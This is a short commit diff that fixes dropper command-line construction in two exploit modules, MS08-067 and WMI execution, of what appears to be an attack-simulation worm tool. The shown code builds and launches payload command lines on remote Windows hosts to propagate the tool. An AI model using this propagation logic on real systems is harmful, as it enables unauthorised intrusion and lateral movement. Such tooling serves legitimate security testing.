Fix dropper bug on wmiexec and win_ms08_067

chaos_monkey/exploit/win_ms08_067.py

@@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter):
 
         # execute the remote dropper in case the path isn't final
         if remote_full_path.lower() != self._config.dropper_target_path.lower():
-            cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+            cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+                      build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
         else:
-            cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
+            cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
-
+                      build_monkey_commandline(host, depth - 1)
-        cmdline += build_monkey_commandline(host, depth - 1)
 
         try:
             sock.send("start %s\r\n" % (cmdline, ))

chaos_monkey/exploit/wmiexec.py

@@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter):
                 return False
             # execute the remote dropper in case the path isn't final
             elif remote_full_path.lower() != self._config.dropper_target_path.lower():
-                cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+                cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+                          build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
             else:
-                cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
+                cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
-
+                          build_monkey_commandline(host, depth - 1)
-            cmdline += build_monkey_commandline(host, depth - 1)
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,